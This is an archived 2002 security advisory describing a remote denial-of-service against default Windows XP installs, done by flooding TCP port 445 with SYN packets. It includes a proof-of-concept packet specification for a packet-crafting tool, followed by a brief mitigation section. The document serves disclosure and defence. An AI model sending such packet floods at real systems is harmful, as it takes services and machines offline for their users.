-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
.---------------.
/ NtWaK0 Advisory \
+-----------------------------------------------------------------------.
:
Affected : Windows XP default install with TCP 445 open :
Type : Remote DOS attacks with SYN Flag. Make CPU 100 % :
Date : 15-02-2002 :
Author : NtWaK0 @ www.SafeHack.com :
+-----------------------------------------------------------------------.
:
+----------------.
Remote/Local DOS \
+------------------`----------------------------------------------------.
:
+-----------. :
Disclaimer \ :
+-------------`---------------------------------------------------------.
The information in this advisory is believed to be true based on :
experiments though it may be false. The opinions expressed in this :
advisory and program are my own and NOT of any company. :
In Fact I do not work for no one at the present time. :
:
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone :
does with this information. So, don't shoot the messenger. :
Remember: Use a computer in ways that ensure respect for your fellows. :
:
+-------. :
T.O.C. \ :
+---------`-------------------------------------------------------------.
:
:
[ Brief History . . . . . . . . . . . . . . . . . . . . . .line 45 ]:
:
[ The Problem . . . . . . . . . . . . . . . . . . . . . . .line 58 ]:
:
[ The Solution . . . . . . . . . . . . . . . . . . . . . .line 130 ]:
:
+-------------. :
Brief History \ :
+---------------`-------------------------------------------------------.
TCP/UPD port 445 is open by default on a Fresh installed XP box. :
The attack is seriouse since it work remotly and can make the CPU 100 % :
in less then 20 Second. :
To learn more about Windows XP please visit: :
http://www.microsoft.com :
:
YES YOUR HAVE GUESSED IT ENGLISH IS NOT MY MOTHER LANGUAGE -:) :
+---------------------------+ :
>>> Test OS Applications <<< :
+---------------------------+ :
Tested on Windows XP :
Default Install with default ports :
:
+-----------. :
The Problem \ :
+-------------`---------------------------------------------------------.
If an attacker target your Windows XP port 445 TCP with some special :
crafted packed [SYN Flag Set] they can cause 100 CPU % utilisation in :
less then 20 Second. The speed while sending the packet was 20 K upload :
sometime less then 18 K [Based on DU-Meter] :
:
I have tried some other default port with a similar attack but the CPU :
utilistation was normal 9 % or 5 %. :
:
The target machine is a windows XP with 240 RAM. :
:
I tried to send packets with other then SYN flag nothing happend. CPU OK:
When I sent about 3000 packets NOT IN ONE SHOT... I was sending the :
packets one after the other, I noticed that CPU utilisation jumped 100% :
:
I could not do any TASK on the XP machine till I stoped sending packets.:
:
I can see this as a seriouse problem if you are using windows XP default:
:
Imagine someone is attacking your Windows XP from 1000 zombies. I am :
not sure if your Windows XP wont Crash. :
:
Like I said I send couples of packets and the CPU jumped in less then :
20 Sec to 100 %. Soon I am going to do more tests to see what will :
happen if I send the same packets but for one hour time or more. :
:
:
+-----------------------------------------+ :
>>> Proof-Of-Concept-Packet-Information <<< :
+-----------------------------------------+ :
[IP] :
SourceAddress= :
SourcePort=1 :
DestinationAddress= :
DestinationPort=445 :
HeaderSize=20 :
SpecifyHeaderSize=0 :
Identification=0 :
SpecifyIdentification=0 :
Checksum=0 :
SpecifyChecksum=0 :
TypeService=4 :
FragmentationType=2 :
DataSize=32 :
Offset=0 :
TTL=1 :
:
[Commands] :
NbPackets=3000 :
PacketType=0 :
:
[TCP] :
fURG=0 :
fACK=0 :
fPUSH=0 :
fRESET=0 :
fSYN=1 :
fFIN=0 :
Acknowledge=0 :
Sequence=0 :
Window=0 :
Offset=0 :
Urgent=0 :
Checksum=0 :
SpecifyTCPChecksum=0 :
Data=xffxffxffxffxffxffxffxffxffffx00 :
:
........................................................................:
........................................................................:
:
+------------. :
The Solution \ :
+--------------`--------------------------------------------------------.
Vendor should be informed...I guess Microsoft read Securityfocus too :
Filter 445 and other UNUSED ports. Stop Unused Services :
+-----------------------------------------------------------------------.
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPG00kPPoW9fFNsN8EQIMcwCg4aNhkGYMIEDs4u+l3MCo5BMZKrcAn17B
fd1j/WRgYSqj/B4AkiohkXNz
=jwkR
-----END PGP SIGNATURE-----
________________________________________________________________________
The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________.___________
Live Well Do Good www.SafeHack.com |
Je Pense, Donc Je Suis \(|)/
I know I ain't perfect, but i'm 99 point 9 percent :) --(")--
RFCs are meant to be read and followed…:) /`\ NtWaK0
________________________________________________________________________
Connect yourself to the main computer and let me take you to a
cybernetic ride. Are you connected to the right cybernet? If you are,
finally you are connected to my brain.
________________________________________________________________________
-=- Use a computer in a ways that ensure respect for your fellow -=-
This archive was generated by hypermail 2b30 : Mon Feb 18 2002 - 18:57:07 PST